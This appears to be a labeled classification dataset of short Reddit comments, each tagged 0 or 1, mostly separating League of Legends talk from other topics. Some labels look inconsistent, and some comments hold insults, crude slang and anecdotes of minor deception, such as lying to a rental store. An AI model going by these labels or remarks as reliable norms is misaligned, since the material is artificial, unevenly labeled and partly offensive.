0	Warning: This is a purely atheist rambling: If this post offends somebody by the rules of Reddit, please, Mods, delete it!<<   I always hated it that there are is no Islamic organisation speaking for the MAJORITY (by proving their membership figures) of all Muslims against so called "Muslim terrorist attacks"   BUT   I also always hated it that there are NO Christian organisations speaking for the MAJORITY of all Christians (by proving their membership figures) against child abuse.   How come? Because they do not follow a common god/cause? Because they denounce the god who somebody from across the ocean is believing in? I do not know! Everybody is expecting an excuse from somebody else…   Both such aforementioned extreme attacks are the worst that I could think of at the moment I am writing this: Violence against the helpless children and against the unaware public (including children).   How's that thing about the majorities? Because there is no GOD! Every person is doing those things because he (or rarely she) is either uneducated, sick, mentally handicapped, influenced by some asshole or mentally disadvantaged in some other way.   Believing in some "higher authority" which is ordering or allowing you to do (or do not) things is scientifically rubbish! You are on your own. AGAIN: THERE IS NO GOD (which one, by the way? Zeus, Aphrodite, Mars, Wicca??)   The most basic thing which is imprinted in our brain is: DO NO HARM!   Thankfully, the majority of any population works this way.   It is not a Christian or a Muslim thing, it is common sense or more basically conservation of the species!   And yes, if you are hating me for denouncing your belief system, you are right! Be it the belief in getting 99 virgins for bringing "Jihad" to the unbelievers or being it that god did not stop you from molesting childs or burning witches or whatever!
0	80 seems excessive to me, since the highest speed limit I've seen is 70. Yeah, people going 80 can fly by me if they want.   And yeah, from America. Police are hit and miss depending on where you are usually. 5 over in a 65 will almost never get you pulled over. I guess if the officer is having an awful day or got chewed out for not writing tickets then you might be in some trouble.   5 over in a 25 is asking for it. Kinda goes back to what I said about the norms of driving. Police, from my personal experience/what I've heard from others, pull people over more often if the law you're breaking also breaks a norm. So 80 in a 65 will definitely do it.
0	Unfortunately it feels so much better and lasts so much longer. It was how I chose to keep myself focused in high school, I mean it feels so good that after even decades of sobriety you can still remember how good it felt, thats not good. It worked sure; but now I'm a recovering addict for the rest of my life.
0	Say the other three cable ends are connected already, both positives are connected, and the negative on the car doing the jumping is connected. When you connect the last cable end, you are completing the circuit between the two cars and this can create a spark. You want that spark to be as far away from the battery as possible due to previously mentioned explosive gases.
0	I wish someone had taken me to a doctor when I was a kid and would wind up crying because there was a fitness test that made me feel like shit. Gym teachers chalk it up to a kid not being good at running, not an actual health issue. I didn't see a doctor about it until I was 25.   It has been difficult, not everything sets it off and I don't know what will until I try it. Running is BAD, stair steppers are fine, ellipticals are not great, biking is bad, rowing is awesome, swimming is fantastic. So far swimming has been best for me, freestyle will set it off after a while (nowhere near as fast as running, that's instant) but I could breaststroke all day without a problem. So far that is my go-to if I don't want to feel like death.   I did find that anxiety really does push it. Any situation where I'm anxious it will get set off way faster. As someone who was (and still is in certain situations) super self conscious being embarrassed about looking ridiculous while exercising plus being scared my throat will close up will just make it close after five minutes on a machine. I had not connected those two until recently and it is something to keep in mind. It was certainly part of why I was more okay to start swimming before any other kind of workout, I was in a pool, I figured you really can't be seen too well when you're underwater.   I recently went on what felt like a vertical hike for the first time with new friends and was so paranoid about not being able to do it that my throat/lungs went nuts really quickly in. When it was established that I might have to take breaks and it was okay, they were cool about it, it stopped happening so badly and much less frequently despite the hike getting gradually more difficult.
0	We call them "buttflickers" in my family and after years of cleaning them up on the side of the road as a boy scout I can say it absolutely infuriates me when I see it on the road. Almost as mad as I get over texting.   STORY TIME! At our local chili's one afternoon, and a huge luncheon of state troopers is also in the restaurant with us. They leave before us and, before actually leaving, several stand outside near their cars for a smoke. My family can see them, because they are right outside our window, and after 3 of the 6 or so officers throw their butts on the ground, my sister, father and I went to the parking lot, quietly walked up to them, and without a word picked up the butts right at their feet. Didn't say a word, and my mom said their jaws dropped when we turned away from them.
0	In all honesty dude every campus is different, and so js every fraternity.  I went to a small college (800 was record enrollment my freshman year) and joined 1 of the 3 frats.  I hated the pledging experience, but after it I made life long friends and had a blast till my senior year wen I rage'd quit.   There are 3 reasons for which I quit, that should help you decide which feat is right for you.  1. Relationship with administration.  By my senior year the college admins decided to start cracking down on parties (not just frats) and made it impossible to have events that brought the student community together. This lead to a lot of the guys just sitting I. Their room doing circle jerks.  2. The physical house. Some houses are awesome, others suck.  When I pledge there was a frat of some cool guys, but during the walk through I saw 2 guys living in essentially a hallway, and another in a closet. I said fuck that. My former frat's house had a cool chapter room (complete with a secret room) and a sweet party room. However, since I was Vice President if student body I was on trustee board for facilities... Where I found out because of asbestos under tiles, which had shitty carpet glued to the top, that they were going to turn it into storage. When I asked what house my frat would get then they just laughed.  Which meant in 2 years no house. This leads into the third point.  3. God damn fucking alumns.   You will find, for most frats, that the alumns who show up other then homecoming have nothing going on in their life.  I tried telling all the alumns about the housing problem we would face, no one listened. No one cared, they just wanted a place to drink, have people "show" them respect, ad talk about the 3 years in college when they were cool.  The final straw was when they decided to kick out my friend for having a piece in the house. Not smoking, or selling pot. Just having a piece. As a house, we voted not to punish him. Then, without any kind of warning a few dip shit alumns and one rich asshole decided to have their own vote I kick him out. Needless to say I flipped the fuck out. I cursed all of them, pointed out the hypocrisy Sig as a former president who grew weed in the basement during he early 90's, brothers who fucked other brothers gf's and so on.  Needless to say, that frat has no house, is laughed at by he majority of campus and is dwindling down to very few active members.   It's a huge commitment, and it comes with a lot if bullshit. Despite all that,  I'd do it all over again.  I grew immensely as an individual. I learned to deal with the type of shenanigans you encounter in the office.  I don't think I would of ever thought about running for student council, I wouldn't of fucked as many bitches, and I would of missed a lot of parties.  All that said, to each their own, what is right for me probably isn't for you.  Ask your teachers what they think of the frats. They can often offer a unbiased view of the frat with more insight then just any student. Hope this helps.  Also, never never play soggy biscuit.
1	I no longer really care for the song. The Basshunter Dota song is actually about Dota. Warriors is a motivational song not actually about league but about a general idea. The song on the Imagine Dragons spotify page makes 0 mention of league of legends. This is just riot paid imagine dragons to say they liked league and that this song is "TOTALLY ABOUT IT".
1	That actually made sense though!   Come to think of it, that's probably why I sucked so hard at lol when I started. I didn't realize that the abilities were basically just types of ability (i.e.: skillshot, nuke, dash, etc.), so I was trying to think logically about what stuff could do. I hated not having time to cast an ability, so I kept buying attack speed so I could get my spells off faster. I thought Nocturne's ult was the coolest thing in the world, so I got movement speed trying to make other people's dashes move that fast. Galio could fly, so I didn't think stuff on the ground (like traps) would affect him.
0	Yes!! I was a pack a day/pack and a half depending on the days. Don't buy a blu ecig or a gas station one, they are a waste of time and money and ..they just suck.. I got a  Kanger evod starter  and they sometimes make the liquid in the store so its all fresh and exactly what you want. One bottle (5-15$) is about = 7/10 (40~60$) packs of puffs (nicotine levels are variant and they help you decide depending on what you were cigs you smoked before). At first i was using it NON STOP all day long but after a while I slowed down, the Twist battery lasts about a whole day going nonstop so I only had to worry about refilling the juice. My only other advice to the starter is if your not getting fresh made juice (if you buy bottles from a tobacco store that has them sitting on the shelf) is to take the cap off and let the water or alcohol evaporate from it for a few days. They use that to preserve the juice but its not good to vape them, also it blands out the flavor a bit. I HAVE smoked a few cigs while out drinking since I quit and the taste is so horrible, and the smell is almost sickening when it just lingers on your hand and clothes you will wonder how you did it for so many years..and you WONT want to buy a whole pack..Best of luck!
1	It's not clogging up anything! It's the stupid memes and other BS that was clogging up this subreddit. Your discussions are something I look forward to each day now to read about how different people play champs.   Don't listen to the pissers and whiners and let the downvotes speak for themselves.
1	You're always matched up with teammates/opponents based on your hidden MMR (which is essentially equivalent to what your ELO rating would have been in the old system). This can go up or down independant of what league you are in. What league you are in irrelevant to the matchmaking engine, and with the inability to be demoted once you reach a new league this is how it should be  (prevents someone from ELO boosting up to diamond league and then ruining games for much higher skilled players forever once they get back on their own account since as long as they keep playing they will never be kicked out of diamond).
1	I dont know about anyone else, but for me.. honestly i dont know if i can still be a fan of MRN anymore if this change stays.  I loved neintonsoh's play in the LCS and he did very well, im not saying that hes not good or anything and that this roster change wont be better for the team but... this just isn't the same MRN that i've come to love and be a fan of.   Even just taking out one player from the team is just depressing.  The MRN I am a fan of is the same MRN that got into the LCS Qualifiers just mere hours before the deadline, the MRN that made a huge upset going 2-0 in the group stages, then coming back from the losers bracket to beat not only one (Meat Playground) of the "better/team's to win" but TWO of them (DirtNap).  Both series of those games made me so excited to watch these games cause they were extremely entertaining and fun to watch. I instantly became a fan and cheered them on for every game they played and it was so awesome to watch them win their games especially against CLG and TSM. I was gonna buy a shirt from the site sometime soon and represent it, but now... no way can i do that.   This change might be better off for the team, but i gotta say, I dont know if anyone else out there agrees with me or not, but, im no longer gonna be a fan of team MRN.
1	Progress is gradual, a lvl1 summoner should not be trying to jungle, and he'll be matched against people who can't jungle either, and he'll learn the ropes making mistakes who aren't severely punished because everyone else will suck just as hard as he does,  and eventually he'll have enough experience and knowledge to try to jungle, speeding up the process won't be good for anyone other than smurfs, which are a big problem already.   Even at level 30 having no jungler can work and win you the game and you want to change the game so people who may not have any previous MOBA experience can jungle? No, just no.   If you want people to learn how to last hit not having runes is a benefit as you'll have to be more accurate, but CSing is not and should not be the main focus of newcomers, do you not remember when you just started the game? So many items, so many skills, to many things to learn about the gameplay, it was good enough if you could keep track of your lane opponent.   Warding, map awareness, proper last hitting, wave control, kiting are things you learn towards the end of your progression as a summoner, you can't and shouldn't expect beginners to understand and apply those concepts.
1	I might get hate but go ahead, Lee is pretty damn strong from what i've witnessed in games, i don't think he needs a rework just a nerf in the amount of damage he dishes out for a low amount of items. (hydra, or hydra/lw) He also has insane life steal if he decides to go full damage (with his second active on his W). He can also pretty easily (with ult) 100-0 just about anyone (except for tanks of course) if he has gone a more damage route. I don't see Lee Sin as balanced but neither OP but somewhere in the area of being a lot stronger then most champs for what they give out.
0	Jesus that's probably the most genuine apology I've ever seen online.  I do understand that it would have been easy to misunderstand my first post...I wasn't really sure how much to go into because of the whole
1	Perhaps because it takes 4 seconds of foresight or a skirmish lasting 4+ seconds in the same area for the damage part of the ult to even apply?   That and one of the only guaranteed damage setups requires the use of an entire item activation (zhonyas) which, after a week, will be an obvious bait that people will stop falling for or be aware of when playing against him. #
1	He's gone from 17 years old to 19 years old since then.  Of course he's changed a lot.   What if Dyrus likes himself better than he did when we first knew him?  What if this is how he copes with everyone wanting to know if he wiped his ass today?  Should Dyrus then change back because some people do not like what he's become?  The answer is no, because Dyrus will never make every one of his fans happy.  Dyrus should do what every adult in the world eventually figures out:  act and live in a manner that makes himself happy without treading upon the happiness of others.
0	Once a few years ago I was leaving work on my road bike (I am an avid cyclist) and saw a very attractive blonde driving a Subaru WRX STi (I worked at a hospital, so STi ha ha ha). I always stop at stop signs and traffic lights. But damn if I didn't I blow through 5 stop signs "racing" her. We met at a stoplight and she took a moment to talk to me when I smiled at her.
1	pick/ban rate has everything to do with the "balance" of the champion.   People pick/bans champions because it has a dominating side. In this example, lee sin is very good in the jungle. many junglers don't enjoy playing against lee sin because of that, therefore you see the bans and picks for the same reason. but lee sin falls short in the other aspects of the game. win rate show
1	I think itemization for tank junglers right now is in a good spot. As a jungler, I can never buy every item I want. My builds after I finish core items for specific champs are ALWAYS different and based around the game I am in. I have to make tough calls like give up HP for the utility and armor of a frozen heart, or take a safer route and go warmog's or randuins so I don't get bursted quickly. Basically, I always have to sacrifice  something  which makes tanks strong. For example, against a balanced/bursty team comp, I might have to sacrifice utility for pure HP/Armor/MR stats, or sacrifice armor against a fed mage. While of course some builds are obvious, such as the Randuins + Thornmai + FR combo against a strong ADC or a full AD team comp, you have to remember,  building this way is a weakness in the enemy team which I am countering . I can't take this auto-attack hating build into a game against a strong AP mid and a caster ADC and expect to do well. While I do agree that there should be more/stronger lifesteal options, I want to make sure that the jungle meta doesn't get punted back to the age where J4, Vi, Rek'sai and Nidalee were the only strong picks.
0	This. A lot of people don't realize how much luck/timing has to do with things.   Ever seen "Love and Other Drugs?" The main character is a good looking chatty guy, so he goes into sales and makes okay money. Then what happens? Pfizer released Viagra, and it was a license to print money. Normal people in their mid-20's making $250k/yr for "selling" a product that sold itself.
1	I think you mean that many players feel that they should be higher, and luck may have a factor here. I feel that the opposite is more true. As a bronze player myself, I really hate being flamed by the Silver Vs I play with. They are literally right at the bottom of that tier and they have this belief that being in Silver makes them far superior to me.
1	Story time: Yesterday I decided to play on a smurf for shits and giggles. Picked my lv7 account, locked in Morgana, bought only a Doran's Ring and proceeded to play. Went to the toplane, besides people telling me to go bot. Didn't try to lasthit with autos, I clicked once in the closest minion and waited for him to die (but I used W to farm the backline, even a beginner would do that I guess). I played like a total noob, which is to be expected of a lv7 summoner.   Needless to say, our Ezreal and Nidalee raged like the plague, called me dumb and that I had Down and some other things that I don't even remember. Our Wukong and Singed, on the other hand, were really cool and even "taught" me how to shop (I said I thought I could only buy at the beginning of the game).   The best thing was that I was still being more useful than our Ezreal and outplaying/murdering an Aatrox with 3 items and passive up while having only a DRing.
1	I lost my first 15~ish games and dropped to 800 elo, never gave up and pulled myself up to 1300 in the months after that. When I heard that your eligibility for rewards would be determined by top and not current rating and that gold rating had been lowered to 1500, I immediately put on my carry pants and supported my way to 1535. I felt so happy about getting gold, despite it being cheapened so much (really, from 1800 to 1500?).
0	why do i always read both
1	Naix and gyro are the two most popular. For very different reasons as well.   I agree with you and I think League has gone too far in one direction to make melee carries possible, I cant see how they do it without those carries being used as bruisers instead or to overcome that all range carries will get 4-7 free shots off in any engagement through kiting alone. BKB only for melee item will make bruisers even more powerful.
1	Imagine it the Season 2 Way. You have lets say 4,5k elo, they have 4,6k elo. Still, you just reached 4,5k elo while he, at some point, already reached 5k Elo. There, he got a shiny badge and is now stated as Platin. But then he dropped down again for 400 Elo, but couldn't drop down to Gold. You on the other hand didn't finish a promo since 3,9k Elo, which we say is now Silver max.
1	Bangkok Titans played this out sloppier than they should have. They should not have given out first blood when G4 played too far up in lane with the jungler back in base or the skirmish in mid lane where ahri died too quickly and then Nautilus went to join her   Overall, their early-mid strategic map movements were way too weak for a first placed team. The poor trade in turrets in their mini-lane push for example, or how they freely gave away top turret when they went for the dragon. At least their teamfight seems to be another level above the Chiefs, for example winning the bottom lane dive that should not have happened because they did not take into account the availability of Maokai's TP after the death of their top laner barely a few seconds ago.
0	Freshman year of high school. I become friends with a sophomore girl, eventually becomes huge crush. I ask her out the following summer, nothing good comes of it, I feel like an idiot. Spring of senior year. She randomly starts talking to me again, we find out we so much in common now and all this great shit. I realized it too late, she was trying to start something. A week before college classes started, she asked me out. We a saw a movie, talked, goodbye hug, nothing special. That's when I realized it. I ask her out te next weekend, turns out she's transferring to a new college at an unreasonable distance away. Haven't talked to her in a while. MY FEELS.
1	But I don't think this is a good tool ONLY for new people. I think average+ players could use this to practice? Why should we limit training tools to just new people. I would LOVE this. But beginner bots are too easy. And if we go with being able to turn it on and off, then why not just have it on all skill levels?
0	I'm posting this on a throwaway as some know my main Reddit username.   My senior year of high school, I was awarded a $1,000 scholarship. Since I was also headed to a state-ran university, I also was granted the [Millennium Scholarship]( My freshman year at college was fantastic because I paid nothing for books or tuition.   However, before my sophomore year, Nevada decides to limit the Millennium Scholarship. Instead of paying for all of your credits in a semester, it'll only pay for twelve credits a semester. Fuck, I'm taking eighteen credits a semester because I have a double major and I want to get out of here as soon as possible. To pay for what the Millennium Scholarship didn't cover, I had to get a part-time job. Thankfully, I got a part-time job at an amazing company as I uncovered.   Why? If you we're a full-time employee, they would pay for $6,000 worth of your expenses each year as long as you pass with a "C+" or higher. By junior year, I got a full-time position. At the end of every semester, I would fax all of my information in. At this point in time, the Millennium Scholarship didn't show that you have a scholarship on your tuition fees. It just shows the amount it paid for and the date it was paid. That's it.   What ended up happening is my company would pay me for whatever the total bill cost regardless. Example: I would pay $2000 a semester. My scholarship would cover up to $960 a semester, so I would pay $1040. My company would pay me for the entire $2000. I was making an additional grand a semester which is like a million dollars to a college kid with no real depth or knowledge on how money works. I paid off my debt, bought a new car ( putting me further into debt ) and bought me shit I didn't need.   So yes, I went to an American university and got paid the last two years to go to school.
1	People get weird about clothes. I'm a white dude, and in middle school I had bought some FUBU shoes, and started wearing them everywhere. Apparently FUBU is a "black brand"? idk. A bunch of people gave me shit for them at school, but it was actually mostly white people who did, so I ignored them.
1	This is absurd, the absolute only reason for a request like this is because less exposure = more time to fix the problem. You have a game model thats based around constantly introducing new heros(every other week?) so obviously you should have a plethora of balancing issues and hopefully have a team that is constantly working on them. Shouldn't bug fixes that are game breaking or near as such be on that teams agenda and be dealt with quickly? Why would "we" the fan base benefit at all from not publicly posting these? When in the past you have proven that you fix problems with much more haste if they are posted everywhere? Your basically asking us to throw you a bone, than selling recolored skins for 10$ and making heroes that cost 6300ip that arent particularily skillful.
1	America. I don't make you say United Mexican States or Dominion of Canada. I realize that is no longer the correct name for Canada, but my point stands. It is not necessary to say the full name of the country, especially when the country is commonly to referred to as such.
0	Not that I have the complete picture, but there are procedural elements I think you're missing.  Being pulled over for a traffic stop doesn't give the officer cause to investigate legal residence.  I think you have to commit a felony for the cops to have cause to go looking for that evidence.   I believe, however, that if a private citizen comes forward with the evidence (and that evidence was obtained legally), that gets around those procedural issues and they can do what they want.
1	This is like all of the people who said WoW would die over and over, every damn year.   It's now "dead" and still has multiple millions of people playing it.
1	I hope this gets more attention here too:   You might be right (can't objectively judge the OPs motivation). I still see no reason though why his opponent would even join a solo queue game at the default time. If anything, that was totally sloppy by hashinshin.   I like the "good sportsmanship" attitude, and trust me I play by them myself - avoiding to kill dc'ed people etc.   But I do feel that if e-sports want to be taken more seriously they need to start establishing  fixed rules  with literally  no exceptions , same as all other professional sports do.   E.g. if you play football (soccer, not american) and you run into someone at full speed, knowing full well that you might break his legs, that is not really considered sportsmanlike - but if you happen to touch the ball first it will still be 'fair play' by the rules, thus your team would win the game..if that was what it took to get the last goal.   I remember some tournament where only after several matches were already played and it came to the first tie, Riot announced that 'time to win' would be the tie breaker. As far as I know that was not officially stated as a rule beforehand, thus giving the teams that played the earlier matches a potential disadvantage, since they did not know that they would gain more by running fast, early win strategies.   Regarding the rules: if the rules do not state what happens when the match gets delayed by one person to a point close before the result deadline, then the only one really to blame is the host/curse. It should be their job to fix this issue by organizing a new 1v1 for those guys + getting their ruleset fixed asap. The 'unsportsmanlike behavior' rule quoted is way to non-specific and can be used for pretty much anything: both OP and his opponent can claim the other guy acted 'unsportsmanlike' - OP for not waiting, his opponent for not being ready in time.
1	Not sure if you are trolling... But I'll explain anyway.   Two things. First of all your list of options in other lanes show perfectly why we need ADCs in botlane. Because with very few exceptions the champions simply don't work outside of 2 man lanes. (Or free farm laneswaps.)   Why do teams need ADCs? Towers. You could easily build a composition without an ADC, that will beat most ADC based compositions in straight up fights. They would however have problems sieging or defending if they get behind.   Your argument is that if a role is necessary they must be balanced or even OP, which from a mathematical standpoint might be correct. ADCs are OP in the same way supports where OP in earlier seasons because they were the ones who could provide utility while buying wards.   Outside of sieging they feel lackluster. And if your team is bad at pealing they are completely useless. This is especially true for non pros (so just about everyone), which contrary to popular belief is a lot more important than the pro scene.
0	So one day not too long after this movie came out, there was a truck coming to my city loaded with tv and NES consoles to have a gaming contest.  I was great at games, would rent them, beat them and then return it to the store in a couple of hours saying it froze or make up some excuse to get them to trade it for free, then beat that game that same night.   Anyhow, I was cocky as fuck when I was lined up behind the truck.  They didn't tell us what game we were going to be playing, and I didn't care.  I noticed the kid in front of me was holding a lot of Nintendo Power magazines so started talking to him.  He looked like a very quiet and shy kid, but fuck was he smart.  He was telling me how he had figured out that we would be playing SMB3, and he used math to do it; he showed me the fucking equation.  He went on about how they were going to base the scoring of the contest on the game points and was sharing secrets with me such as the Goomba Stomp Trick (level 1-2 using the raccoon tail to never hit ground until you got 8,000 points from stomping Goomba's, then do it again) and a whole bunch of other tricks I can't remember.   I realized right then and there that I didn't have a hope in hell of beating this kid if he was right (he did win the competition by the way).  So, I get into the truck and sure enough it is SMB3.  What do I do? Haul ass to the castle, fly up and get the damn warp whistle.  Fuck them all, I was the wizard for that moment.  I got my pin, which I still have, and left happy to get just that.
1	My friend and I queued up for a ranked game and we ended up getting another group of duo queuers who were randoming, so we said fuck it and we randomed and we both got supports. In the game everybody went mid and us and the other duo queuers all bought recommended items on mostly supports. We were at one point 10+ kills down and we ended up winning the game.
1	I'd suggest finding a champion you love, and maining them for a while.  Meaning playing only that champ for a good amout of time.  When you learn one champ really well a lot of confusion and barriers are lifted.  You see how the game works with this champ and you can slowly take that experience into other champions if you wish.  I think of it like math.  If you jump from one concept before fully understanding a key point that comes before the new concept, you'll always struggle at least a bit.  Imagine if when you were younger they decided to start teaching you multiplication before you even fully understood addition.  It'd be a real struggle.   Find a good guide on your champ, read it thoroughly, and you'll improve because you'll be able to focus easier.  You'll be thinking about how to play that specific champ and have a base for improvement.  Jumping around champs can make things difficult.  On top of learning the idea of not overextending you're trying to learn a new champion.  Eventually when you get the hang of it, things should go a little like: Hey on Teemo I learned how to not overextend, now let me bring that to a new champ.  Then you learn something different on another champ like last hitting more efficiently.  And over time you build up these ideas until they come naturally and you can apply them to any champion you play.
0	Having to work on national holidays means you probably work in retail or service, although you don't really say...   I work in retail, specifically in a seasonal store that does winter sports at that time of year and pools/patio furniture in the summer.   This means that I an expected to work weekends, which quite honestly doesn't bother me anymore. Aside from that, the only national holidays we are open for are memorial day, 4th of july, and labor day. We are compensated 2x, and for a good portion of the staff working on these days is more or less optional. The holidays we are closed for ( Thanksgiving, Christmas and easter) all full time employees receive 8 hours holiday pay (normal pay rate even though I'm at home eating a huge meal and drinking wine).   My boss doesn't like paying overtime so during most of the year he requires that we keep our weekly hours at 40 max (which I think is horse shit, I'd work 60 hours/week if I could) but these holidays are generally the most slack days of the year so hanging out for a few hours on labor day morning like I'm doing today doesn't hurt at all.   Anyway, you should find a job with more fair practices when it comes to compensation. Before doing so though consider what kind of benefits you may or may not be realizing at work. For example, my employer offers to cover a very low percentage of my healthcare should I choose to get it through them, and I would end up paying about $4800/month for coverage for a single male. On the other side of the coin, I get privileges to a handful of ski resorts (which can be worth $1000s if you're an avid snowboarder like me) and really great discounts on TONS of products both in the store and online retail incentive programs. I haven't had to pay retail price on most apparel in a few years.   Just weigh the pros and cons before getting out, because as much as it sucks, crap work is a whole lot better than no work.
1	The thing here is:  Will you actually be able to use the 15% extra CDR in an efficient way?  It will only be increasing your damage, if you use skills exactly the moment they come of cooldown and if you have no blue buff.  The thing I also mentioned above is that you will run oom insanely fast without an extended mana pool from tear or athenes passive.  Let say you finish double Morello or Morello/Tear/Rod at 20 minutes.  You will be around level 14: 916 base Mana on Ori.  The tear build gives you 400 extra Mana while only getting 125% (20 mana regen per 5)  instead of 200% (30 mana regen per 5).  Adding your base mana regen of 15 at level 14 you have 45 mana regen per 5 on double morello and 35 mana per 5 on tear morello rod.  A teamfight starts:  You use your full spell rotation (QWER) 370 Mana.   Your almost full spell rotation (QWE) 220 Mana.  You will sit at 326 Mana now without tear, 726 Mana with tear.  You only get mana for less than one Q back every 5 seconds (lets say that are the Qs in between your rotations).  One more QWE an you sit at 116 Mana without, 516 with tear.  After using QWER,QWE,QWE with 2 Qs inbetween you will be almost OOM. 3 spell rotations in a teamfight and you are left without mana.  With Tear you can do 2 more rotations QWE + QWE.  Imagine a classic Orianna teamfight, you used QWE once to engage only for movementspeed or you tried to poke once and missed.  Without tear you can use your spellrotation twice now during the teamfight. In an extended fight you will drop oom super fast.
0	Thanks for the
0	socialism is almost a more capitalist watered down version   Kind of the opposite considering Marx said there would be a bloody revolution from capitalism to socialism. Socialism isn't what most people think it is, it's the state owning the means of production. So, for example, the American government would own the car factories, the hospitals, the farm land, etc. From here, the administration (the state) would wither away and you'd be left with communism. Marxist communism is actually a stateless society.   Edit: Am I really getting downvotes?
1	People shouldn't be ridiculed about these things regardless if they are true or not, sure if it's true it can hurt more, but people are often hypnotized into believing negative remarks when they hear it from many sources. Simple stuff like you're stupid from half a dozen people over time really can get to someone. For instance, my brother grew up thinking he was so stupid because he was held back (hospital, nearly died when he was in 2nd grade.) Was he? No, he had bad self esteem and ended up not applying himself and just making excuses, "I'm stupid." Later as an adult he came to understand this shit isn't true but that doesn't mean it didn't impact him incredibly deeply.   Moral of the story, everything we say and do has consequences, we can't be perfect. One side shouldn't let it bother them, the other side shouldn't have said/done it. That's unfortunately not how it is. Imo the biggest key to success in life is simply coping with it.   It's cool that you were relating with her, that's kind of why we're all here in the LoL subreddit? To connect with other (hopefully level minded) LoL fans. Well that and to find badass LoL content.
0	Not a week goes by where I don't see some asshole making this point. Tipping is part of a social contract. We allow people to make less than minimum wage realizing that what they earn will be based on the service they are able to provide. You, as the customer, have the right to inflate their wages as much or as little as you see fit. If you don't want your servers to be tipped and still want quality service, be prepared to pay at least double your check. The employer would have to pay that wage all hours of the day weather business is slow or fast. Also, a server at guaranteed wages has no incentive to make sure you're well taken care of. You should also expect the kind of bang-up service that you get from minimum wage employees at McDonalds.
1	I think what he means by a support jungler is not that he plays support junglers like Nunu, Alistar, Maokai, Nautilus, etc. It's that he supports his team in his game play. TOO used to listen to the calls of Reginald to control where he goes and what he does, usually letting TRM be independent top and letting Chaoxpecial take care of bot while ganking mid a lot to control mid game. More recently (after dyrus swap), he has been taking more charge and ganking top and bottom a lot more. Although, TOO still suffers from playing the support jungler role in his plays still. Unlike junglers like SV who are carry junglers who naturally take the lead and make plays based on their own understanding of the map and not what his teammates want him to do.
1	I really wish it was quite the opposite in normals. In normals there is no order or way to differentiate who gets what role, so the best way to deal with it is to allow the first person to say what role they are planning on choosing to have the rights over that role. If you called AD carry, and someone else is like "Hey, I just bought vayne and I really want to try her out, can you go top?" Then that is a perfectly good manners and most people if they aren't being douche's will gladly switch with that person.   But what isn't ok is not communicating and autolocking. Autolocking makes it seem like you don't care what the rest of your team has to say, and it shows that you really probably wouldn't care if you lost the game, as long as you get to play that champion. And for not communicating, I have actual a good example for why no communication should mean no choice in picks.   2 days ago I entered a queue with the intention of playing akali. I had just started trying her and I actually won and carried my first 2 games with her, going mid. So I say I'm going mid with her, and choose her, but don't lock in. After that everyone else chooses their roles except for one person, who  had not said anything yet. The last role that was available was top, so I said in chat "(person's name), we need a top laner." Well that person continued to not say anything the entirety of team select, and at the very last moment decided to autolock lux. Why? Because she wanted to go mid. And you know what? The rest of my team agreed with them just because she choose a champion that isn't as good top as my champion. This was just mind boggling to me because it is almost as bad as simply autolocking, but they decided to wait until the very last second, preventing me from actually possibly choosing a champion I was familiar with at top.   Now I bet alot of you are saying right now "Lux isn't nearly as good at top as akali, you should just stop being a baby about who goes where and play" Yea. Maybe I would have done that, if the enemy top laner wasn't a garen, yes, basically the ultimate counter to akali top lane. And then after I died twice from him spinning to win whenever he wanted, I said to lux "hey, can you go to top lane, you have range on him and I don't." Nope, she just stayed mid and caused me to get ganked and zoned until I had 1/3rd of garen's farm and he was 5/1.   Now what was really funny is that despite my huge disadvantage, when my lane was broken I continued to farm, started to gank other lanes, and we ended up winning because we made a comeback, which probably wouldn't have been necessary if I went mid in the first place...
1	Is this the line for Hitler's band of grammar Nazi's?   (On topic, tragic that Odee's house sustained that amount of damage and possessions lost. Between Thanksgiving and Christmas in the US at least is way more prone to events such as this and for it to hit someone such as Odee who's active in eSports kinda hits a note for everyone. I really hope even with as tight as a lot of people's pockets are during this time of year that Odee is able to get his family and himself back on their feet as well as having a pleasant Christmas and so far as it looks people are defiantly in the Christmas spirit in terms of helping one another.
1	Actually jungle mains probably get the most blame in league imo, cause it so easy to blame them for not ganking. Also when I first started playing league I got a lot blame whenever I played support and didn't ward, I learned how to peel because me team chewed me out about it, and I had an adc leave our lane becuase I didnt suicide to save him. In fact I think the role that gets the least flack is the top later.
1	still a problem it seems, i just created a us smurf to play with Arithien after his daily shows( 6:30pm CST (12:30am GMT)   tried to play a game as the EU servers have a 1hr+ wait and kept getting this error, thought it was my firewall/internet not liking the US for some reason
1	He was likely planning on quitting anyways. But yeah, his claim was that the crowd alerted his opponent to his proxy gate.  There's also the game in GSL(OGN's sc2 tourney) where he probe rushed.
0	CANADIANS CLICK THIS LINK TO TAKE ACTION:   This gives an overview of the Bill. The main work will need to be done by Canadians in contacting their representatives and Canadian-run websites and companies.   We need American Redditors to help spread the word to websites and companies in the US that do business with Canadians to make them aware of this legislation, and add pressure to the Canadian government to avoid passing the bill.
1	With 560 data points you get a 95% confidence interval with less than 2% of spread. So his true winrate is almost certainly within 38%-42%. Compared to his pre-patch winrate of 43%, that's almost certainly a decrease.
0	A: I think some perspective is needed.   B: he's now done more to deserve a Nobel peace prize than Obama ever has C:yes he's a homophobic POS, no one is condoning that, their praising him for avoiding a war(lots of people die in wars) D: I like Obama, voted for him twice. This whole situation, his lies(gitmo,ending the wars) have me really feeling like I voted for Romney anyway
0	It's really not different than a bass guitar or a bass fish. It's not pretentious to mix up those pronunciations, it's just wrong.   The Greek food item is pronounced 'year-oh' everywhere I've been in America except certain little backwater towns like Philadelphia and New York.   A 'jy roe' is a rapidly spinning motor. I'm not necessarily going to argue with someone who calls the food a 'jy roe' but calling it the wrong thing doesn't make you correct, it makes you a meat head.
0	So I live in a big apartment with my roommate. Back in December we had a new roommate who paid his rent late, who ate our food etc. Classic scumbag, but he was a friend so it was cool.   After a few weeks we realized he was using our shampoo, soap and deodorant. So my roommate asked him "What the fuck?", and he said he had no money, but he'd buy some soon. 2 weeks later he was still using all our stuff.   Then one day I found out he was regularly using my roommate's electric razor to shave his balls and asshole... and he never cleaned it... my roommate had to clean it herself before using it. And he broke it.   What. the. fuck. So my roommate decided to hide her stuff, and lock it. We talked to him about it, and he started screaming, saying it was normal to share everything and that we were selfish... he moved out the same day. Of course the whole time he had always enough money for alcohol, cigarettes, clothes, soda and junk food.
1	It's a throwaway, OP will not deliver today. No other comments, no submissions or anything.
